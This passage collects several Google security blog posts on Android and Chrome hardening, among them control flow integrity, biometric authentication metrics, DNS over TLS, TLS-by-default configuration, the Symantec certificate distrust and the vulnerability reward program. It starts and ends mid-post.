happy to see the progress across the web ecosystem.Help improve Site Isolation!We offer cash rewards to researchers who submit security bugs through the Chrome Vulnerability Reward Program. For a limited time, security bugs affecting Site Isolation may be eligible for higher rewards levels, up to twice the usual amount for information disclosure bugs. Find out more about Chrome New Feature Special Rewards.

Posted by Ivan Lozano, Information Security Engineer [Cross-posted from the Android Developers Blog]Android's switch to LLVM/Clang as the default platform compiler in Android 7.0 opened up more possibilities for improving our defense-in-depth security posture. In the past couple of releases, we've rolled out additional compiler-based mitigations to make bugs harder to exploit and prevent certain types of bugs from becoming vulnerabilities. In Android P, we're expanding our existing compiler mitigations, which instrument runtime operations to fail safely when undefined behavior occurs. This post describes the new build system support for Control Flow Integrity and Integer Overflow Sanitization. Control Flow IntegrityA key step in modern exploit chains is for an attacker to gain control of a program's control flow by corrupting function pointers or return addresses. This opens the door to code-reuse attacks where an attacker executes arbitrary portions of existing program code to achieve their goals, such as counterfeit-object-oriented and return-oriented programming. Control Flow Integrity (CFI) describes a set of mitigation technologies that confine a program's control flow to a call graph of valid targets determined at compile-time. While we first supported LLVM's CFI implementation in select components in Android O, we're greatly expanding that support in P. This implementation focuses on preventing control flow manipulation via indirect branches, such as function pointers and virtual functions—the 'forward-edges' of a call graph. Valid branch targets are defined as function entry points for functions with the expected function signature, which drastically reduces the set of allowable destinations an attacker can call. Indirect branches are instrumented to detect runtime violations of the statically determined set of allowable targets. If a violation is detected because a branch points to an unexpected target, then the process safely aborts. Figure 1. Assembly-level comparison of a virtual function call with and without CFI enabled. For example, Figure 1 illustrates how a function that takes an object and calls a virtual function gets translated into assembly with and without CFI. For simplicity, this was compiled with -O0 to prevent compiler optimization. Without CFI enabled, it loads the object's vtable pointer and calls the function at the expected offset. With CFI enabled, it performs a fast-path first check to determine if the pointer falls within an expected range of addresses of compatible vtables. Failing that, execution falls through to a slow path that does a more extensive check for valid classes that are defined in other shared libraries. The slow path will abort execution if the vtable pointer points to an invalid target. With control flow tightly restricted to a small set of legitimate targets, code-reuse attacks become harder to utilize and some memory corruption vulnerabilities become more difficult or even impossible to exploit. In terms of performance impact, LLVM's CFI requires compiling with Link-Time Optimization (LTO). LTO preserves the LLVM bitcode representation of object files until link-time, which allows the compiler to better reason about what optimizations can be performed. Enabling LTO reduces the size of the final binary and improves performance, but increases compile time. In testing on Android, the combination of LTO and CFI results in negligible overhead to code size and performance; in a few cases both improved. For more technical details about CFI and how other forward-control checks are handled, see the LLVM design documentation. For Android P, CFI is enabled by default widely within the media frameworks and other security-critical components, such as NFC and Bluetooth. CFI kernel support has also been introduced into the Android common kernel when building with LLVM, providing the option to further harden the trusted computing base. This can be tested today on the HiKey reference boards. Integer Overflow SanitizationThe UndefinedBehaviorSanitizer's (UBSan) signed and unsigned integer overflow sanitization was first utilized when hardening the media stack in Android Nougat. This sanitization is designed to safely abort process execution if a signed or unsigned integer overflows by instrumenting arithmetic instructions which may overflow. The end result is the mitigation of an entire class of memory corruption and information disclosure vulnerabilities where the root cause is an integer overflow, such as the original Stagefright vulnerability. Because of their success, we've expanded usage of these sanitizers in the media framework with each release. Improvements have been made to LLVM's integer overflow sanitizers to reduce the performance impact by using fewer instructions in ARM 32-bit and removing unnecessary checks. In testing, these improvements reduced the sanitizers' performance overhead by over 75% in Android's 32-bit libstagefright library for some codecs. Improved Android build system support, such as better diagnostics support, more sensible crashes, and globally sanitized integer overflow targets for testing have also expedited the rollout of these sanitizers. We've prioritized enabling integer overflow sanitization in libraries where complex untrusted input is processed or where there have been security bulletin-level integer overflow vulnerabilities reported. As a result, in Android P the following libraries now benefit from this mitigation: libui libnl libmediaplayerservice libexif libdrmclearkeyplugin libreverbwrapper Future PlansMoving forward, we're expanding our use of these mitigation technologies and we strongly encourage vendors to do the same with their customizations. More information about how to enable and test these options will be available soon on the Android Open Source Project. Acknowledgements: This post was developed in joint collaboration with Vishwath Mohan, Jeffrey Vander Stoep, Joel Galenson, and Sami Tolvanen

Posted by Vishwath Mohan, Security Engineer[Cross-posted from the Android Developers Blog]To keep users safe, most apps and devices have an authentication mechanism, or a way to prove that you're you. These mechanisms fall into three categories: knowledge factors, possession factors, and biometric factors. Knowledge factors ask for something you know (like a PIN or a password), possession factors ask for something you have (like a token generator or security key), and biometric factors ask for something you are (like your fingerprint, iris, or face). Biometric authentication mechanisms are becoming increasingly popular, and it's easy to see why. They're faster than typing a password, easier than carrying around a separate security key, and they prevent one of the most common pitfalls of knowledge-factor based authentication—the risk of shoulder surfing. As more devices incorporate biometric authentication to safeguard people's private information, we're improving biometrics-based authentication in Android P by: Defining a better model to measure biometric security, and using that to functionally constrain weaker authentication methods. Providing a common platform-provided entry point for developers to integrate biometric authentication into their apps.A better security model for biometricsCurrently, biometric unlocks quantify their performance today with two metrics borrowed from machine learning (ML): False Accept Rate (FAR), and False Reject Rate (FRR). In the case of biometrics, FAR measures how often a biometric model accidentally classifies an incorrect input as belonging to the target user—that is, how often another user is falsely recognized as the legitimate device owner. Similarly, FRR measures how often a biometric model accidentally classifies the user's biometric as incorrect—that is, how often a legitimate device owner has to retry their authentication. The first is a security concern, while the second is problematic for usability. Both metrics do a great job of measuring the accuracy and precision of a given ML (or biometric) model when applied to random input samples. However, because neither metric accounts for an active attacker as part of the threat model, they do not provide very useful information about its resilience against attacks. In Android 8.1, we introduced two new metrics that more explicitly account for an attacker in the threat model: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). As their names suggest, these metrics measure how easily an attacker can bypass a biometric authentication scheme. Spoofing refers to the use of a known-good recording (e.g. replaying a voice recording or using a face or fingerprint picture), while impostor acceptance means a successful mimicking of another user's biometric (e.g. trying to sound or look like a target user). Strong vs. Weak BiometricsWe use the SAR/IAR metrics to categorize biometric authentication mechanisms as either strong or weak. Biometric authentication mechanisms with an SAR/IAR of 7% or lower are strong, and anything above 7% is weak. Why 7% specifically? Most fingerprint implementations have a SAR/IAR metric of about 7%, making this an appropriate standard to start with for other modalities as well. As biometric sensors and classification methods improve, this threshold can potentially be decreased in the future. This binary classification is a slight oversimplification of the range of security that different implementations provide. However, it gives us a scalable mechanism (via the tiered authentication model) to appropriately scope the capabilities and the constraints of different biometric implementations across the ecosystem, based on the overall risk they pose. While both strong and weak biometrics will be allowed to unlock a device, weak biometrics: require the user to re-enter their primary PIN, pattern, password or a strong biometric to unlock a device after a 4-hour window of inactivity, such as when left at a desk or charger. This is in addition to the 72-hour timeout that is enforced for both strong and weak biometrics. are not supported by the forthcoming BiometricPrompt API, a common API for app developers to securely authenticate users on a device in a modality-agnostic way. can't authenticate payments or participate in other transactions that involve a KeyStore auth-bound key. must show users a warning that articulates the risks of using the biometric before it can be enabled.These measures are intended to allow weaker biometrics, while reducing the risk of unauthorized access. BiometricPrompt APIStarting in Android P, developers can use the BiometricPrompt API to integrate biometric authentication into their apps in a device and biometric agnostic way. BiometricPrompt only exposes strong modalities, so developers can be assured of a consistent level of security across all devices their application runs on. A support library is also provided for devices running Android O and earlier, allowing applications to utilize the advantages of this API across more devices . Here's a high-level architecture of BiometricPrompt. The API is intended to be easy to use, allowing the platform to select an appropriate biometric to authenticate with instead of forcing app developers to implement this logic themselves. Here's an example of how a developer might use it in their app: ConclusionBiometrics have the potential to both simplify and strengthen how we authenticate our digital identity, but only if they are designed securely, measured accurately, and implemented in a privacy-preserving manner. We want Android to get it right across all three. So we're combining secure design principles, a more attacker-aware measurement methodology, and a common, easy to use biometrics API that allows developers to integrate authentication in a simple, consistent, and safe manner. Acknowledgements: This post was developed in joint collaboration with Jim Miller

Posted by Giles Hogben, Privacy Engineer and Milinda Perera, Software Engineer [Cross-posted from the Android Developers Blog]Developers already use HTTPS to communicate with Firebase Cloud Messaging (FCM). The channel between FCM server endpoint and the device is encrypted with SSL over TCP. However, messages are not encrypted end-to-end (E2E) between the developer server and the user device unless developers take special measures. To this end, we advise developers to use keys generated on the user device to encrypt push messages end-to-end. But implementing such E2E encryption has historically required significant technical knowledge and effort. That is why we are excited to announce the Capillary open source library which greatly simplifies the implementation of E2E-encryption for push messages between developer servers and users' Android devices. We also added functionality for sending messages that can only be decrypted on devices that have recently been unlocked. This is designed to support for decrypting messages on devices using File-Based Encryption (FBE): encrypted messages are cached in Device Encrypted (DE) storage and message decryption keys are stored in Android Keystore, requiring user authentication. This allows developers to specify messages with sensitive content, that remain encrypted in cached form until the user has unlocked and decrypted their device. The library handles: Crypto functionality and key management across all versions of Android back to KitKat (API level 19). Key generation and registration workflows. Message encryption (on the server) and decryption (on the client). Integrity protection to prevent message modification. Caching of messages received in unauthenticated contexts to be decrypted and displayed upon device unlock. Edge-cases, such as users adding/resetting device lock after installing the app, users resetting app storage, etc.The library supports both RSA encryption with ECDSA authentication and Web Push encryption, allowing developers to re-use existing server-side code developed for sending E2E-encrypted Web Push messages to browser-based clients. Along with the library, we are also publishing a demo app (at last, the Google privacy team has its own messaging app!) that uses the library to send E2E-encrypted FCM payloads from a gRPC-based server implementation. What it's notThe open source library and demo app are not designed to support peer-to-peer messaging and key exchange. They are designed for developers to send E2E-encrypted push messages from a server to one or more devices. You can protect messages between the developer's server and the destination device, but not directly between devices. It is not a comprehensive server-side solution. While core crypto functionality is provided, developers will need to adapt parts of the sample server-side code that are specific to their architecture (for example, message composition, database storage for public keys, etc.)You can find more technical details describing how we've architected and implemented the library and demo here.

Posted by Shawn Willden, Staff Software Engineer [Cross-posted from the Android Developers Blog]Our smart devices, such as mobile phones and tablets, contain a wealth of personal information that needs to be kept safe. Google is constantly trying to find new and better ways to protect that valuable information on Android devices. From partnering with external researchers to find and fix vulnerabilities, to adding new features to the Android platform, we work to make each release and new device safer than the last. This post talks about Google's strategy for making the encryption on Google Pixel 2 devices resistant to various levels of attack—from platform, to hardware, all the way to the people who create the signing keys for Pixel devices. We encrypt all user data on Google Pixel devices and protect the encryption keys in secure hardware. The secure hardware runs highly secure firmware that is responsible for checking the user's password. If the password is entered incorrectly, the firmware refuses to decrypt the device. This firmware also limits the rate at which passwords can be checked, making it harder for attackers to use a brute force attack. To prevent attackers from replacing our firmware with a malicious version, we apply digital signatures. There are two ways for an attacker to defeat the signature checks and install a malicious replacement for firmware: find and exploit vulnerabilities in the signature-checking process or gain access to the signing key and get their malicious version signed so the device will accept it as a legitimate update. The signature-checking software is tiny, isolated, and vetted with extreme thoroughness. Defeating it is hard. The signing keys, however, must exist somewhere, and there must be people who have access to them. In the past, device makers have focused on safeguarding these keys by storing the keys in secure locations and severely restricting the number of people who have access to them. That's good, but it leaves those people open to attack by coercion or social engineering. That's risky for the employees personally, and we believe it creates too much risk for user data. To mitigate these risks, Google Pixel 2 devices implement insider attack resistance in the tamper-resistant hardware security module that guards the encryption keys for user data. This helps prevent an attacker who manages to produce properly signed malicious firmware from installing it on the security module in a lost or stolen device without the user's cooperation. Specifically, it is not possible to upgrade the firmware that checks the user's password unless you present the correct user password. There is a way to "force" an upgrade, for example when a returned device is refurbished for resale, but forcing it wipes the secrets used to decrypt the user's data, effectively destroying it. The Android security team believes that insider attack resistance is an important element of a complete strategy for protecting user data. The Google Pixel 2 demonstrated that it's possible to protect users even against the most highly-privileged insiders. We recommend that all mobile device makers do the same. For help, device makers working to implement insider attack resistance can reach out to the Android security team through their Google contact. Acknowledgements: This post was developed in joint collaboration with Paul Crowley, Senior Software Engineer

Posted by Sai Deep Tetali, Software Engineer, Google Play Protect[Cross-posted from the Android Developers Blog]At Google I/O 2017, we introduced Google Play Protect, our comprehensive set of security services for Android. While the name is new, the smarts powering Play Protect have protected Android users for years. Google Play Protect's suite of mobile threat protections are built into more than 2 billion Android devices, automatically taking action in the background. We're constantly updating these protections so you don't have to think about security: it just happens. Our protections have been made even smarter by adding machine learning elements to Google Play Protect. Security at scaleGoogle Play Protect provides in-the-moment protection from potentially harmful apps (PHAs), but Google's protections start earlier. Before they're published in Google Play, all apps are rigorously analyzed by our security systems and Android security experts. Thanks to this process, Android devices that only download apps from Google Play are 9 times less likely to get a PHA than devices that download apps from other sources. After you install an app, Google Play Protect continues its quest to keep your device safe by regularly scanning your device to make sure all apps are behaving properly. If it finds an app that is misbehaving, Google Play Protect either notifies you, or simply removes the harmful app to keep your device safe. Our systems scan over 50 billion apps every day. To keep on the cutting edge of security, we look for new risks in a variety of ways, such as identifying specific code paths that signify bad behavior, investigating behavior patterns to correlate bad apps, and reviewing possible PHAs with our security experts. In 2016, we added machine learning as a new detection mechanism and it soon became a critical part of our systems and tools. Training our machines In the most basic terms, machine learning means training a computer algorithm to recognize a behavior. To train the algorithm, we give it hundreds of thousands of examples of that behavior. In the case of Google Play Protect, we are developing algorithms that learn which apps are "potentially harmful" and which are "safe." To learn about PHAs, the machine learning algorithms analyze our entire catalog of applications. Then our algorithms look at hundreds of signals combined with anonymized data to compare app behavior across the Android ecosystem to find PHAs. They look for behavior common to PHAs, such as apps that attempt to interact with other apps on the device, access or share your personal data, download something without your knowledge, connect to phishing websites, or bypass built-in security features. When we find apps exhibit similar malicious behavior, we group them into families. Visualizing these PHA families helps us uncover apps that share similarities to known bad apps, but have yet remained under our radar. After we identify a new PHA, we confirm our findings with expert security reviews. If the app in question is a PHA, Google Play Protect takes action on the app and then we feed information about that PHA back into our algorithms to help find more PHAs. Doubling down on securitySo far, our machine learning systems have successfully detected 60.3% of the malware identified by Google Play Protect in 2017. In 2018, we're devoting a massive amount of computing power and talent to create, maintain and improve these machine learning algorithms. We're constantly leveraging artificial intelligence and our highly skilled researchers and engineers from all across Google to find new ways to keep Android devices safe and secure. In addition to our talented team, we work with the foremost security experts and researchers from around the world. These researchers contribute even more data and insights to keep Google Play Protect on the cutting edge of mobile security. To check out Google Play Protect, open the Google Play app and tap Play Protect in the left panel. Acknowledgements: This work was developed in joint collaboration with Google Play Protect, Safe Browsing and Play Abuse teams with contributions from Andrew Ahn, Hrishikesh Aradhye, Daniel Bali, Hongji Bao, Yajie Hu, Arthur Kaiser, Elena Kovakina, Salvador Mandujano, Melinda Miller, Rahul Mishra, Damien Octeau, Sebastian Porst, Chuangang Ren, Monirul Sharif, Sri Somanchi, Sai Deep Tetali, Zhikun Wang, and Mo Yu.

Posted by Jan Keller, Security TPMGoogle CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we paid $31,1337.00, and most importantly: you had fun playing and we had fun hosting!Congratulations (for the second year) to the team pasten, from Israel, for scoring first place in both the quals and the finals. Also, for everyone who hasn’t played yet or wants to play again, we have open-sourced the 2017 challenges in our GitHub repository.Hence, we are excited to announce Google CTF 2018:Date and time: 00:00:01 UTC on June 23th and 24th, 2018Location: OnlinePrizes: Big checks, swag and rewards for creative write-upsThe winning teams will compete again for a spot at the Google CTF Finals later this year (more details on the Finals soon).For beginners and veterans alikeBased on the feedback we received, we plan to have additional challenges this year where people that may be new to CTFs or security can learn about, and try their hands at, some security challenges. These will be presented in a “Quest” style where there will be a scenario similar to a real world penetration testing environment. We hope that this will give people a chance to sharpen their skills, learn something new about CTFs and security, while allowing them to see a real world value to information security and its broader impact.We hope to virtually see you at the 3rd annual Google CTF on June 23rd 2018 at 00:00:01 UTC. Check g.co/ctf, or subscribe to our mailing list for more details, as they become available.Why do we host these competitions?We outlined our philosophy last year, but in short: we believe that the security community helps us better protect Google users, and so we want to nurture the community and give back in a fun way.Thirsty for more?There are a lot of opportunities for you to help us make the Internet a safer place:Our Vulnerability Rewards Program: Report vulnerabilities in our infrastructure and get rewarded(AutoFuzz) Patch Rewards Program: Fix vulnerabilities in open-source software to build your reputation and make an impact in the security communityVulnerability Research Grants Program: Apply for a research grant to extensively test a component of our infrastructure at your own pace.

Posted by Elie Bursztein, Anti-Abuse Research Lead - Ian Goodfellow, Adversarial Machine Learning Research LeadRecent advances in AI are transforming how we combat fraud and abuse and implement new security protections. These advances are critical to meeting our users’ expectations and keeping increasingly sophisticated attackers at bay, but they come with brand new challenges as well.This week at RSA, we explored the intersection between AI, anti-abuse, and security in two talks.Our first talk provided a concise overview of how we apply AI to fraud and abuse problems. The talk started by detailing the fundamental reasons why AI is key to building defenses that keep up with user expectations and combat increasingly sophisticated attacks. It then delved into the top 10 anti-abuse specific challenges encountered while applying AI to abuse fighting and how to overcome them. Check out the infographic at the end of the post for a quick overview of the challenges we covered during the talk.Our second talk looked at attacks on ML models themselves and the ongoing effort to develop new defenses.It covered attackers’ attempts to recover private training data, to introduce examples into the training set of a machine learning model to cause it to learn incorrect behaviors, to modify the input that a machine learning model receives at classification time to cause it to make a mistake, and more.Our talk also looked at various defense solutions, including differential privacy, which provides a rigorous theoretical framework for preventing attackers from recovering private training data.Hopefully you were to able to join us at RSA! But if not, here is re-recording and the slides of our first talk on applying AI to abuse-prevention, along with the slides from our second talk about protecting ML models.

Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer[Cross-posted from the Android Developers Blog]The first step of almost every connection on the internet is a DNS query. A client, such as a smartphone, typically uses a DNS server provided by the Wi-Fi or cellular network. The client asks this DNS server to convert a domain name, like www.google.com, into an IP address, like 2607:f8b0:4006:80e::2004. Once the client has the IP address, it can connect to its intended destination.When the DNS protocol was designed in the 1980s, the internet was a much smaller, simpler place. For the past few years, the Internet Engineering Task Force (IETF) has worked to define a new DNS protocol that provides users with the latest protections for security and privacy. The protocol is called "DNS over TLS" (standardized as RFC 7858).Like HTTPS, DNS over TLS uses the TLS protocol to establish a secure channel to the server. Once the secure channel is established, DNS queries and responses can't be read or modified by anyone else who might be monitoring the connection. (The secure channel only applies to DNS, so it can't protect users from other kinds of security and privacy violations.)DNS over TLS in PThe Android P Developer Preview includes built-in support for DNS over TLS. We added a Private DNS mode to the Network & internet settings.By default, devices automatically upgrade to DNS over TLS if a network's DNS server supports it. But users who don't want to use DNS over TLS can turn it off.Users can enter a hostname if they want to use a private DNS provider. Android then sends all DNS queries over a secure channel to this server or marks the network as "No internet access" if it can't reach the server. (For testing purposes, see this community-maintained list of compatible servers.)DNS over TLS mode automatically secures the DNS queries from all apps on the system. However, apps that perform their own DNS queries, instead of using the system's APIs, must ensure that they do not send insecure DNS queries when the system has a secure connection. Apps can get this information using a new API: LinkProperties.isPrivateDnsActive()With the Android P Developer Preview, we're proud to present built-in support for DNS over TLS. In the future, we hope that all operating systems will include secure transports for DNS, to provide better protection and privacy for all users on every new connection.

Posted by Chad Brubaker, Senior Software Engineer Android Security[Cross-posted from the Android Developers Blog]Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting all data that enters or leaves an Android device with Transport Layer Security (TLS) in transit. As we announced in our Android P developer preview, we're further improving these protections by preventing apps that target Android P from allowing unencrypted connections by default.This follows a variety of changes we've made over the years to better protect Android users. To prevent accidental unencrypted connections, we introduced the android:usesCleartextTraffic manifest attribute in Android Marshmallow. In Android Nougat, we extended that attribute by creating the Network Security Config feature, which allows apps to indicate that they do not intend to send network traffic without encryption. In Android Nougat and Oreo, we still allowed cleartext connections.How do I update my app?If your app uses TLS for all connections then you have nothing to do. If not, update your app to use TLS to encrypt all connections. If you still need to make cleartext connections, keep reading for some best practices.Why should I use TLS?Android considers all networks potentially hostile and so encrypting traffic should be used at all times, for all connections. Mobile devices are especially at risk because they regularly connect to many different networks, such as the Wi-Fi at a coffee shop.All traffic should be encrypted, regardless of content, as any unencrypted connections can be used to inject content, increase attack surface for potentially vulnerable client code, or track the user. For more information, see our past blog post and Developer Summit talk.Isn't TLS slow?No, it's not.How do I use TLS in my app?Once your server supports TLS, simply change the URLs in your app and server responses from http:// to https://. Your HTTP stack handles the TLS handshake without any more work.If you are making sockets yourself, use an SSLSocketFactory instead of a SocketFactory. Take extra care to use the socket correctly as SSLSocket doesn't perform hostname verification. Your app needs to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further, beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.I need to use cleartext traffic toWhile you should use TLS for all connections, it's possibly that you need to use cleartext traffic for legacy reasons, such as connecting to some servers. To do this, change your app's network security config to allow those connections.We've included a couple example configurations. See the network security config documentation for a bit more help.Allow cleartext connections to a specific domainIf you need to allow connections to a specific domain or set of domains, you can use the following config as a guide:<network-security-config> <domain-config cleartextTrafficPermitted="true"> <domain includeSubdomains="true">insecure.example.com</domain> <domain includeSubdomains="true">insecure.cdn.example.com</domain> </domain-config></network-security-config>Allow connections to arbitrary insecure domainsIf your app supports opening arbitrary content from URLs over insecure connections, you should disable cleartext connections to your own services while supporting cleartext connections to arbitrary hosts. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.<network-security-config> <domain-config cleartextTrafficPermitted="false"> <domain includeSubdomains="true">example.com</domain> <domain includeSubdomains="true">cdn.example2.com</domain> </domain-config> <base-config cleartextTrafficPermitted="true" /></network-security-config>How do I update my library?If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOSOur team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at: g.co/AndroidSecurityReport2017Google Play ProtectIn May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.Protecting users' devicesPlay Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.Preventing PHA downloadsDevices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.Security updatesWhile Google Play Protect is a great shield against harmful PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.New security features in Android OreoWe introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.Openness makes Android security strongerWe’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.Security reward programsWe continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million dollars, pushing our total rewards past $2 million dollars since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.In parallel, we introduced Google Play Security Rewards Program and offered a bonus bounty to developers that discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.External security competitionsOur teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Posted by Devon O’Brien, Ryan Sleevi, Emily Stark, Chrome security teamWe previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.Chrome 66If your site is using a SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. The DevTools message you will see if you need to replace your certificate before Chrome 66.Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.Chrome 70Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.The DevTools message you will see if you need to replace your certificate before Chrome 70.If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.Expected Chrome Release TimelineThe table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.ReleaseFirst CanaryFirst BetaStable ReleaseChrome 66January 20, 2018~ March 15, 2018~ April 17, 2018Chrome 70~ July 20, 2018~ September 13, 2018~ October 16, 2018For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.Special Mention: Chrome 65As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering in to special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.

Posted by Emily Schechter, Chrome Security Product ManagerFor the past several years, we’ve moved toward a more secure web by strongly advocating that sites adopt HTTPS encryption. And within the last year, we’ve also helped users understand that HTTP sites are not secure by gradually marking a larger subset of HTTP pages as “not secure”. Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as “not secure”.In Chrome 68, the omnibox will display “Not secure” for all HTTP pages.Developers have been transitioning their sites to HTTPS and making the web safer for everyone. Progress last year was incredible, and it’s continued since then:Over 68% of Chrome traffic on both Android and Windows is now protectedOver 78% of Chrome traffic on both Chrome OS and Mac is now protected81 of the top 100 sites on the web use HTTPS by defaultChrome is dedicated to making it as easy as possible to set up HTTPS. Mixed content audits are now available to help developers migrate their sites to HTTPS in the latest Node CLI version of Lighthouse, an automated tool for improving web pages. The new audit in Lighthouse helps developers find which resources a site loads using HTTP, and which of those are ready to be upgraded to HTTPS simply by changing the subresource reference to the HTTPS version.Lighthouse is an automated developer tool for improving web pages.Chrome’s new interface will help users understand that all HTTP sites are not secure, and continue to move the web towards a secure HTTPS web by default. HTTPS is easier and cheaper than ever before, and it unlocks both performance improvements and powerful new features that are too sensitive for HTTP. Developers, check out our set-up guides to get started.

Posted by Jan Keller, Google VRP Technical Pwning MasterAs we kick-off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We looking forward to continuing our collaboration with the community in 2018 and beyond!2017, By the NumbersHere’s an overview of how we rewarded researchers for their reports to us in 2017:We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.Drilling-down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.A few bug highlightsEvery year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!Here are a few of our favorites from 2017:In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile pwn2own competition, and Guang’s report helped strengthen its protections even further.Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.Making Android and Play even saferOver the course of the year, we continued to develop our Android and Play Security Reward programs.No one had claimed the top reward for an Android exploit chain in more than two 